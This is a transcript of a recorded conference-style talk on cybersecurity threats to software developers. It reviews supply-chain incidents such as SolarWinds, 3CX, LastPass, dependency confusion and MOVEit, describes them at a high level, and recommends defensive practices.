 Tom here from Warren systems. I am speaking at a private event and the title of my talk is going to be Defending developers and developing a cybersecurity strategy to defend them now this talk has a lot of slides And I thought for YouTube I give it a different name. It's gonna be called code of armor Defending your team against cyber threats. So those of you that were interested in me having a video version of the stock That's what this is all the slide decks links sources for all this information I put together are also going to be included in the air in the description down below and It may or may not be the type of video you want but I wanted to make sure it's publicly available for those that are interested in watching This video you can go through all these resources. It's actually gonna be a lot I have to say in terms of the different attacks as I go through them But these are what my presentations look like it's gonna be a little strange Just not in front of an audience doing it But I will do my best and go through the slides and explain them and let's get started Code of armor building a resilience against cyber threats for developers. I'm your presenter Tom Lawrence I'm an IT services solution writer open source advocate. I design network storage virtualization solutions. I like hanging out with the red teams I'm a blue team defender in practice. I keep a purple team mindset Which means I kind of have to be on both sides of the fence really thinking about how the attacks happen And of course how to defend against them Let's start with who we're defending against and that's threat actors. Who are they? What are they after how have they evolved who are they are really anyone who wants your information will broadly define it is that There are really two different types that are primarily seen It's gonna be your nation-state actors which are gonna be embedded deep into systems Looking more probably for espionage not necessarily to create chaos Of course, sometimes they may want to depending on which nation-state it is But the majority the ones that you see and hear about in the news are going to be ones that are simply after monetary gain That is mostly what they're after espionage is a piece of it and those are your relatively sophisticated ones, but the Common ones we're seeing more than anything else across the small business and even some of the larger enterprise spaces You know ransomware being probably the king thing you see in the news when it comes to cybersecurity It's gonna be ones that are after a monetary gain The rise of ransomware as a service just like business models that we have for our companies Ransomware as a service is exactly like it sounds they put a business model and a plan around it They have really become a group of sophisticated individuals This started out pretty small in terms of the types of attacks and how they scaled them and the way threat actors would leverage You know ransomming you and it took a skilled threat actor to manage the software manage the exploits and This was not something that scaled very easy Just like the sass business of getting people to put things into the cloud So one team who's really good at managing that aspect of that component can get really good at it ransomware as a service really expanded this a Developer creates a specific ransomware code code is sold to the affiliates Affiliates spread malware and pay with cryptocurrency money is divided between developer and affiliates It's just like any other sass program. It's software as a service that you can use It just happens to be software that encrypts files. It is a really advanced marketplace They have with the affiliate systems with the companies behind it with the way they track the payments It's actually really really talented people who are writing it. It's unfortunate They're writing things for well the wrong side of the law here and doing it but they don't really see this as Something bad that they're doing and interviews that you can find with them They frequently think of themselves as the heroes as they're just pointing out that there's flaws in these things and leveraging those flaws And your insurance companies are paying for it. So they're not really causing any real harm They've really not thinking very deeply as far as the actual damages they cause to the businesses They're often in foreign countries. They don't have any direct consequences until they step over the line too much the smaller operators generally can operate almost with the impunity in terms of Getting caught or actually worried about something happening to them It's usually when they step on the wrong company hit some critical infrastructure that things can go arrive for them And it's not that people don't care at the government. It's just that it's such a widespread problem It's hard to get the resources to actually go after the smaller ones But when the bigger ones come out, this is what happens now in the past We simply had the spam botnet ransomware peddlers and ransomware operator and victims and this ransomware service Kind of breaks these all down to be different people and the ransomware operator service Really has expanded the victim so the ability for one RAS operator to kind of use their automation tools to deploy this at scale Is absolutely amazing. They kind of form essentially criminal groups You can look at them in some ways as a business the business to be something illegal But they are pretty organized with a hierarchy and have an entire org chart and a group of people that do this So they're not just some amateurs It's not just a couple people working out of a state such as Russia where they can't be extradited It's really an advanced group that can be a little bit more expanded than just one geographical area But they're usually going to be non extradition areas Now one of the things that's really split up and expanded with the threat actors is the initial access brokers This is marketplaces essentially so the initial access access broker marketplaces have expanded now to really go wild and include All these people who have go hey, I have access. I want to sell and that's all they do is sell access So all the other parts can be broken down by different adversaries, but they don't even have to now Target you there's people who are either a maybe they have a friend Maybe there's someone trying to sell access from the inside of an inside actor doing this Maybe they've just found something and they're like, oh cool And I don't want to deal with the illegal side of actually doing this and that's where the initial access brokers can be even more than Just people in a non extradition area if someone has some skills instead of finding some flaw and reporting it They go I can go throw it over on this marketplace and that kind of removes them a little bit from it I mean obviously in any legal terms No, but it's not always that we know who the initial access brokers are but this has also created some opportunity for people to watch some of these marketplaces and Determine if a company's information is available on there And if you see that a company is for sale and they can identify what that company is Sometimes that's not as easy as it sounds. There was a large attack that we knew was looming We knew someone had a large number of VMWare servers that they had infiltrated But the initial access broker was looking for a pretty big payout because of being such a large company and they gave a Few details because it's not like they say the company name. They say we have a large number of VMWare servers I'm ready to action on this. I'm wanting to buy wanting someone to buy this. It's a US company So they should pay the ransom, you know, these are some of the types of postings you'll get It's like anything for sale. They put a value on it based on the value of that target and how much they think they can Sell it for and then the race is on because well This one was publicly known because of its scale and scope that to try to figure out who it was before they became another item in the news Now it's not that our government does nothing about this this question comes up a lot when I'm discussing with clients They are once someone crosses that line to get big enough and as the resources get bigger for the government to go After these people they are offering rewards to disrupt these ransomware groups The FBI has taken an active role in disrupting them infiltrating them. So there is some good news on there There's just so many of them and the non extradition part makes it particularly hard But offering rewards to other people because criminals and no honor among these means sometimes they may turn each other in for this And so I think there's still some progress being made so that's as far as I'll go on the ransomware and the threat actors Because that's as much as I'm gonna talk about there Let's talk about the actual attacks that they perform and how they're targeting developers We're gonna start with do the acronyms save us because there's a lot of people that just assume they're safe What about these acronyms AV next-gen AV EDR MDR XDR sim sock Don't they all solve the problem and in reality is not really but they're getting better These are way better tools than they were before so the defenses are getting better But they're not full pull if you still have to have a plan It is great that they've moved these forward that we've got tools that are really more challenging for these people to get Through and give us more intel and let us action on things But they're still not the end all just solve all problems with these tools They are a big help though. The other argument is it won't happen to me I just want to put this out there because this is something that a lot of people don't realize and it's something that I Deal with a lot where companies are a little bit smaller, especially if you're in a startup phase No one's going to bother writing a news article That's because your company is not too small to be attacked But it's probably too small to make the news throughout He is even if you're a small business and a startup and you got funding and maybe someone padded you on the back For this funding and you've got some excitement around it But if you don't make it and it doesn't make the news or no one bothers to write it because there's a lot of NDAs Wrapped up in this when an event happens you just go well I guess that startup that received ten million dollars didn't make it because well They got hacked and we don't know that they got hacked unless there's a public disclosure of it And if they haven't reached that many Customers they haven't really gotten into any fields that require reporting like an SEC register type company does Then it may just not make the news at all and this is something that happens frequently It's one of those perception problems where I only see big companies in the news Therefore it must only happen to big companies. That's just not how this works Developers developers developers as he famously ranted on the stage Yes, they are the targets and a big piece of why I'm doing this talk here is because they realized It's one of those things where the tools that I mentioned are making some things harder But when you talk about getting into a developer the person who generally has the most levels of privilege because they need it They are becoming a more focused target because this also allows them to for example The companies we're going to talk about get into the other companies that may be the further down the pipe target So by targeting the developers and a software they make this gives them that Edge they need to get by all those tools because we can trust the software It was developed and if it was developed and something nefarious placed in it and that trust follows through because they don't know There was something compromised. This is why developers are such a big target right now Solar wins. This is the one that had the most fame simply because it Absolutely was an amazing attack. It was very sophisticated. I know there's all the jokes gone around from solar winds one two Three week passwords, etc. But there's a lot more to this attack because this attack was an absolute Sophisticated brilliant attack and I don't say that lightly I'm not looking at admiration to the threat actors that did this in any way other than the skill and tactics and techniques The solar winds attackers ran a masterclass in novel hacking techniques modified seal software code used domain names to select the targets mimic the Orion software communications program program Protocols and cleaned the crime scene that is brilliant when it comes to Tactics and techniques normally they don't back all their software back out normally they don't target by domain They're happy to get in places But they very judiciously went through each one of the infected clients figured out which domains that these infections were coming from So they had a lot of reconnaissance and once they realized they had a target that they wanted They would then action on that Modifying sealed software code they modified the build server so that the code going in and the code going out always look Like it built properly even though it had extras. That's outstanding They mimicked the Orion communications protocols So they looked at how the Orion software communicated and then embedded essentially a telemetry within that So even those looking at it with their tools and looking at the network connectivity, they took the time to mimic It wasn't just firing off some random here's some domain. It's gonna go to type of Noise it's actually mimicking the protocols and you had to kind of decipher Oh in between the numbers was where the data was going these extras were added into this one when it actioned That's really amazing and clean in the crime scene Who takes the time to hack a very large company and then remove all their tools a really sophisticated threat actor Who doesn't want to get caught? There is a lot to this I've got links if you want to dive deep in exactly how they did it But it's something we're talking a little bit about but it's definitely something pretty outstanding because the attackers start accessing SolarWinds all the way in September This was September 12. They start injecting code then in November 4th They stop injecting the test code they sit and wait till February 20th Then from there they escalate in March to start the distribution of the back door the distribution starts and only goes from March And then starts in May then June remove it now They started doing some activation of what they called teardrop This was a tool where they were actually hands-on keyboard They didn't want to show an automated tools that might get caught But the fact that they removed from the build environment they quit distributing the malware meant all the subsequent releases that were going on Afterwards were clean so if you had someone in your networking you're trying to figure out how you're like Oh, we updated solar winds and by the way, we didn't find this until December 12th So because this wasn't even found all the way till December 12th You had all these other months where there were updates and all those updates were clean It was only when Mandiant was attacked that they were going we keep copies of all the old things that we installed So Mandiant started rolling backwards to go through all their previous copies and go which one of these had something in it And that's what really Triggered them to go. All right, that's where it is And that's why this is such a sophisticated attack. So from 2019 when I started injecting all the way till we find it in 2020 December that's just a long time to be very very patient just to collect data And then hand to do each one of these they also took the time to laterally move into the network to other systems as not to alert as How they got there in the first place from the solar wind system. So that's why there's so much hands-on keyboard very manual Migration they did to get laterally in the network. Let's go just a little bit deeper and talk about how it worked So once you get on premise solar winds moves over to the Orion Finds the back door it activates back doors backs environments back door gathers info This is a lot of that initial hands-on part Then it connects to initial C2 server together the info then they move over set up cobalt strike for a second C2 Then remote control via cobalt strike beacon and that's where they have the cobalt strike C2 So they actually have multiple C2 servers command and control servers doing this and each one of these being very hands-on The initial gathering is the trying to figure out what company they're in. That's where they only action against certain companies This was just so carefully crafted despite the absolute incredible number of downloads. It's not like they attacked everyone 18,000 was our best estimate for how many downloaded the code between March and June of 2020 That narrow number and this was used I believe at about 400 of 500 of the fortune 500 companies that is an incredible number to not action on all those companies I think you had access to all these major companies But then narrowed it down to a much smaller number of the actual targets now Let's go through some key takeaways. The build server was not well audited or protected That's ultimately how they got in and how they were able to do this There was no learning on unauthorized server access So the fact that someone modified this build server did not raise alarms that things should be really locked down tight In-depth validation would have identified an unauthorized change to the patch code They did modify the build server to kind of ignore this But once again if you would have been really validating each step of the way and the binaries of the build server itself Everything on there and done a higher level of auditing They should have noticed the patch in there and a software bill of materials and network connections probably would have helped as well This is something that's been challenging in the marketplace to say Hey, are these expected connections in the spec on there because this is something companies should really push for is when software is on Their network. What would he we expect that software to behave as what are the listed known sites that that software should go to and All the different software that was built with this is just some pie in the sky Hopeful stuff that I like to throw in there because I'm standing in front of developers or talking to developers at this time Now let's move on to dependency confusion how I hacked into Apple Microsoft and dozen of other companies This got some fanfare But I almost feel not enough because this attack was so simple so clever and so effective and I don't feel It's completely fixed dependency confusion pip install package name installing dependencies for your projects has become very easy This is great. We're talking about Python here specifically, but this applies to other libraries as well that you may be building with We have a lot of different external resources that we're gonna pull when we're doing development and those packages and resources are well Under attack quite a bit more here in 2023 This goes back a couple years to prove that there's other ways to attack it not just by poisoning an existing one But by creating confusion on the dependencies of them and there's a whole link I have to get into the really programming details of it. Let's talk about what actually happened here Simply put they went and looked at an interesting piece of code over here like a no JS source code found on github And we noticed that when PayPal and these other large companies are building their apps You have dependencies and the dependency order is try to find these and if these don't exist in the local library Go ahead and go out and pull them well At least that's how a lot of people assumed it was working. It would actually do the opposite. It would look for a library outside of The build environment and a lot of systems do this by default a lot of the build tools do so if there's a Version outside of it'll pull that before it'll pull the local libraries that are built specifically for the client Even worse if the version number is higher on the outside than on the inside So if you had one where it does have an inside one and an outside one and you bump the version number on your outside one It'll pull that one ahead of the internal builds and it seems like this wouldn't work What happens if malicious code is uploaded to MPM under these names is the question It was asked is it possible for some that some of PayPal's internal project will start defaulting to the new public packages instead of the private ones Yeah, probably Will developers or even automated systems start running the code inside the libraries? That's the real question here Will this attack work against other companies, too? So would this actually work? Would we be able to pull this code and Make it work validating attacks with DNS. Yeah, that's the good way to do it because they didn't want to Really go into doing this and executing something would do something malicious This was a security researcher trying to see if this it works So they set up some DNS calls to go outside of their network and reach out if these libraries did a thing and well So did it work? And the answer is it worked for PayPal Apple Tesla Shopify Uber Microsoft and more companies and at some point the person that collected bug bounties for all of these and Stop doing it because at some point you have enough companies and hopefully someone made notice of this that these companies were Failing this simple out-of-order namespace squatting essentially figure out what some of the internal library names are which probably you can reverse engineer some of the Codes you can find some of this code out there You can there's different methodologies they can use or you can use to figure out What libraries are being asked for and then just putting version numbers higher and putting code out there that has the same name That didn't exist before and just creating the existence of it and when it reaches out to do the build and pulls those external dependencies Here they come and execute on things Now let's talk about what we can do to stop that utilize scopes and namespaces Ensure that your internal dependencies are pulled from private pastories get hub defined with the appropriate prefix and scopes secure the build environment create dedicated lockdown secure build environment with strict permissions and Monitor for vulnerabilities validate hashes and checksums whenever possible validate that a dependencies checksum match Is that documented of the official package sources vendor dependencies rather than pulling dependencies from a private Registry and public repositories on demand every time an environment built reduce the risk dependency confusion by embedding the source code For all dependencies internal extra in your code repository. I didn't say this was easy by the way. I'm just saying these are suggestions for it I know that's a lot, but it's something to consider when you're building these environments Now I've used this graphic way too much all modern infrastructure a project Some random person in Nebraska has been think we'll see maintaining since 2003. This happens a lot in software development There's so many different Interdependencies it is why the supply chain in some ways is very fragile because there's always that one thing that well We find out is kind of what is going to pull the whole system down if that thing becomes compromised Python package Index had one person on call to hold back weekend mailware rush We speak to info director after a project temporarily freezes new user accounts the Python package index home to more than 455,000 Python code repositories caged itself to new users in our projects over the weekend because it could not deal with a rush of efforts to create malicious accounts and co-libraries they had to stop it because I mean granted they have more people but one person was on call and It's causing that much of a problem Python is incredibly important Many of you probably develop in Python, but this doesn't only apply to Python. This problem though is pretty widespread We even see supply chains attack against things like VS code malicious extension detected a more than 45,000 downloads Exposed back doors and enabled and this was simply called dark Dracula. Actually, I thought they did a nice shot They made a little icon for it. We see 45,000 downloads because hey It's an attempt to improve Dracula colors consistency on VS code Making it more pleasant to the eyes during coding sessions, which is very important to any developer and even me You know, I like dark mode and I would get Dracula dark mode I would click on an icon that look like that that seems cool and Apparently 45,000 people that did but now you have something in your visual studio in the marketplace for visual studio the place the Watering hole for developers here to grab some of these things and it took a while before it got detected This is just in May of 2023 Now we can jump over here to a supply chain attack that mandate has a really nice right up on here with 3cx 3cx is a large phone provider They provide to a massive number of the fortune 1000 companies and many many more small businesses They compromise the supply chain of 3cx specifically this turned out to be North Korea and their goal was Cryptocurrency and stealing it. They had a very narrow scope of companies They were targeting but they knew those companies use 3cx that worked in a crypto space And they wanted to get inside their network and what better way to do it than build your threat Into the 3cx software the way they did this was really clever They compromise a company with an called trading technologies that made some day trading software Now I don't know if this is coincidence or back to initial access brokers But whoever compromised that software realized a developer at 3cx had loaded the compromised trading software on the same System that builds the 3cx desktop app so that combination of information whether it was them doing it initially or it was sold on a broker market then was Activated and they took this infection and back door They had on this developers computer to start inserting themselves into the 3cx software supply chain And from there with the software pushed out they decided which people they wanted to attack This was also a very narrow scope. They didn't activate this everywhere It wasn't even initially caught very well It was actually very tricky to figure out how they were gonna catch it and they said alright Which ones are we gonna activate on they had kind of a target list if they were in certain environments Then it would actually do a second stage of it So it's not that they had the full Back door in this tool They had only part of it and then it would pull down the second stage if it was on the right target machine in the right target Environment that's how they targeted their victims on there It kind of helps a vague detection, but they still did get detected They didn't really seem to get all the way to their target with this one But it definitely sent out some warning signals because they could have Changed it up later because it reached out and beacons and it only sent back if it was in the target But once they were discovered they for reasons I'm not sure maybe they didn't want to create chaos They could have probably actioned more companies because this got distributed pretty broadly before it was caught It was actually out in the market for probably five or six days before people really stopped and said no no We think there's a back door. There's a problem with this and things have definitely gone awry Now let's talk about last pass a lot of people have heard of them They're a very popular password solution and They made some really poor mistakes that led to their own supply chain compromise. Once again, they target the developer They were able to use the developers privilege to pivot access and gain access to source code gain access to storage buckets And some of the archive backups they have so they got pretty deep into the system and they did so Their engineer had failed to update Plex software. It led to massive data breach I can't really think of a business use case for having Plex software on this No more than I can think of a business use case for day trader software being on the developers laptop that develops the 3cx software Both of these are huge problems that were hey, we've got this infected version or in Plex It's actually there was a flaw in it that was able to be exploited also weird that Plex I'm assuming was publicly exposed on here for them to leverage this I remember when his patch came out and it also came out a while ago So this was actually someone who was embedded for a long time with this particular system or they installed a old version more recently It's a little fuzzy on exactly how that happened either way I can't think of any good reason any developer should be running Plex on the system that signs software that builds the last-pass product Let's talk about solutions to some of these problems BYOD don't allow bring your own disaster. This is something that people ask us a lot We just say please no, we don't want to try to secure your laptop that we only get partial control over to log into things Your personal computers can be your personal computers businesses ones Especially if you're a developer and you are developing software. This gives a high level of access. It's not that expensive by a computer It's it's way less expensive than any breach that you may suffer from this So just don't don't bring your own disaster software policies Know what's on the system and why lock it down to only what's necessary and no more That is a absolute critical piece of this separate systems email communication is not on critical server and have the differences Credentials for privileged tasks having this all separated out I have friends that work in development in highly secure environments And they have to deal with the pain in a bud of I can't have my email and my slack on the same one I actually signed the code on But they go that's life and this helps keep things very separate because if they did click a phishing email You physically can't jump over to the laptop sitting next to them a lot harder to do Forensics and backups systems used for development should be monitored closely and have long-retained backup revisions this helps with the forensics teams because Mandiant was able to catch the entire solar winds attack because they had revisions of all the previous versions eat every time There was an update to that solar winds. They had another backup of it So it allows you to go when did this get here if we suspect it was from this particular computer Do we have a series of revisions on this so we can go back because maybe the threat or remove themselves from it? Maybe they erase the computer as the final act and without any forensics to go backwards on you may think okay They back up the code that's on or they don't really back up the computer It's good if you can if you have the storage you have the ability to have an entire snapshot done on a regular Basis with a long retention time for that computer highly recommend it Honey tokens and honeypots have these on your network your file system documents, etc They are high-fidelity ways to know if someone touched something. There's a lot of stuff you can do with like the free canary tokens They're simple easy. They're Provided by canary dot tools and there's plenty of other ways to do this besides canary tokens I just bring them up because they have a free service for doing this They let you sprinkle around things like some of the Amazon tokens And they look like real tokens and the threat actor cannot resist checking them and checking in will alert you You can also create certain files and documents that do similar where you can have alerts sent to you going someone touched that and what you Do is you just name these documents? Certain things that you know the developers may know not to touch them But the reactors getting in there don't these are some early warnings that something happened as opposed to Finding out months later when they've went through an entire maybe sold on a market and then got deep into your system Now let's talk about publicly exposing things and what goes wrong I am absolutely someone who pushes to put everything behind a VPN But then the business world slaps me and says no time you're gonna make it really inconvenient for people and You know why not just expose these apps because then the abusers can just log right in Before you do that, please do a lot of testing. We're gonna walk through Eaton works They are a security research group person that absolutely did some amazing work here They have several write-ups, but this one about Toyota that happened earlier this year It was just uh, well, we're gonna walk through it here Hacking into this toy does so global supply chain network toes GS PIMS is a web app used by toy employees and their suppliers to coordinate projects parts surveys purchase another test Related to the global supply chain and it was hacked By a security researcher so nothing too bad yet here system admin access achieved through Accidentally introduced back doors part of the user impersonation act as feature any user can be logged in To just by knowing their email completely bypassing various corporate login flows Issue was responsibly as close to it at November 2022 and fixed and timely manner So good until it but let's walk through what happened here and The code in the links are all down there so you can look closer But basically they found in the login screen that you could patch the code to return true literally that simple and I actually like because it says hello. Welcome to GSP IMS Are you a toy user? Are you supplier and the comment from the security church goes? They should have had one that says are you in hacker option because the fact that you could go in and you know Press that really hacky key f12 and start pushing in and modifying the code right in our browser and say Let's just set these to return true and see if it lets us log in And they patched the code also to remove the logout code so you can actually just delete that and That got them completely in to the Toyota supply chain network just Yeah, I'm kind of blown away But it kind of makes me feel that this never went through any real application testing prior to it getting out into the real world here Reporting it to Toyota though. What happened here? The issue was reported to it on November 3rd 2022 and they responded later that same day confirming They received the report on November 23rd. They confirmed the issue was remediated Although I know it was fixed before then when I randomly tested I then informed them I would publish my write-up after the industry standard 90 day here It has passed so to fix the issue by making the Crete JWT and find by email endpoints return HUB says 400 bad requesting all cases this was some of the ways that they were able to just kind of poke at it and Go through and figure out they just needed to set those settings and it would flip back because they all returned responses until you could find them so Good on them for doing it Move it described as managed file transfer software This is another one that I just don't really think went through a lot of security testing But certainly is becoming incredibly popular in the enterprise market When I built these slides together there were several vulnerabilities in it There's even been one more found after I made my slides. How does it work? It's actually pretty slick here managed file transfer software to threat actor would find a host running a movement Environment they had the exploit the first exploit cve 2023 3462 to drop a human dot two dot ASPX web shell in there. They would leverage a web shell to execute commands on target Connect it to a c2 server so command and control server where they could exfiltrate the data This was actually going on for a long time where no one noticed it These threat actors were just going through finding any servers publicly exposed embedded on different sites There's different ways you can search for these they could find them with tools like showdan If you know how to mess around with google, there's actually some clever ways You can find a lot of these at google indexed and they would just go around hitting them And if they were a target worth exfilling the data because there was something on there of value The c2 server would get a copy of it and then later they could go through and threaten these people with Hey, you wouldn't want all this data publicly exposed because these were hospitals college institutions Many many cities that's kind of what got the bigger attention was city and state governments using this in a Pretty extreme way and I had friends that were going through kind of a race against time In calling these individual cities to get them to shut down the server because we knew they couldn't patch it fast enough So there was a lot of help coming into the space from cyber security researchers because it was kind of a race against time of hey The notifications went out but notifications going out from move it and they were very on top of it They had a blog post on it. They were trying to contact clients But when you talk about thousands and thousands of clients telling them to patch and telling them to Shut down the software they used to get files moved around publicly You know, one of those are necessarily going to happen very fast And if it disrupts business, there's kind of that other problem of they may not want to shut it down And they also need to investigate how much data was leaked because they may have some reporting responsibility to do Now in terms of the number of servers out there That the move it sql injection was be able to action on it was about 2,500 were Found and that doesn't sound like a lot But when you start saying that these are mostly large scale companies using it that suddenly is a different number once you start knowing some of these companies are like large oil companies and hospitals and College institutions and entire states that use this that number is suddenly really really big and really really scary in terms of impact Huntress was actually very on top of this particular incident Huntress and they start what they refer to as a rapid response when they dive into something like this So june 1st they added shareable huntress yard rules for assistance and detection effort They added cost of committee sigma rules to Assistant detection effort what these are different rules you can apply in your network to see if you're vulnerable See if you're being attacked on here Added screenshots for the dlo that creates these what they do by putting all this out there as well They're giving sysadmins the tools they need to really go. Hey, these are the things you need to start looking for Added cve added registry locations for enriched investigation analysis added video demonstration approval comment Exploitation added video demonstration for rce and ransomware added latest cve and other proof of concept details They went further than just doing it. They said where there's smoke. There's fire And this is what I mentioned There's already another vulnerability since I made these slides that came out Once you know that there's an app that has a sequel vulnerability and they patch it There's a chance that they mitigated the way that attack worked So you hand them a proof of concept and they go we're going to patch it this much Well, it didn't take long for huntress goes well the applied patch stops the way we know They were getting in but now there's more ways to get in so they were actually going we can actually elevate this From another attack after it's patched and we can even deploy a ransomware payload if we want So it's not just about xfil anymore. It's actually about actionable Pivoting this to full admin privileges because this runs at a high level of privilege in the system And turning it into a full ransomware event on the servers that's attached to to share these files I'm gonna leave you with this here everything we do to secure things before an incident seems alarmist Everyone tells you you're too crazy. You don't need to do all these things to secure You don't have to have two laptops. You don't have to keep communications separate You don't have to build an entire secure environment and audit all these details But if there's an incident everything we did before will seem adequate because even companies like Mandiant who do High levels of work to secure their environments because they are some of the top premier threat hunters and incident response teams They still got popped by the solar winds So it's all that things they had still seemed inadequate once you found out someone was inside your network All right, final slide here sources and further reading lauren stop video slash defending developers 2023 This is where I have all the links for all the sources. So you can dive deep into that Toyota hack You can dive deep into the mandiant right up on solar winds three cx and all these these are extensive I've read through all of them if you go further than a mandiant one It's actually fun because I listened to all the congressional testimony They revealed even more details and you can find that even on youtube It's pretty easy to find it's a long watch But they walked through the details of just how hard some of this stuff was to decipher take a part And uh, that's where I learned a lot of these at anything you want to reach out to me I'm always available starting at lauren systems.com and whatever socials. I'm on is always kept up to date there I like to point people at my website rather than uh social media networks that mirror and be here depending on when you're watching this video because People do things and uh change your mind about how this should work. Thank you. Leave your questions comments concerns down below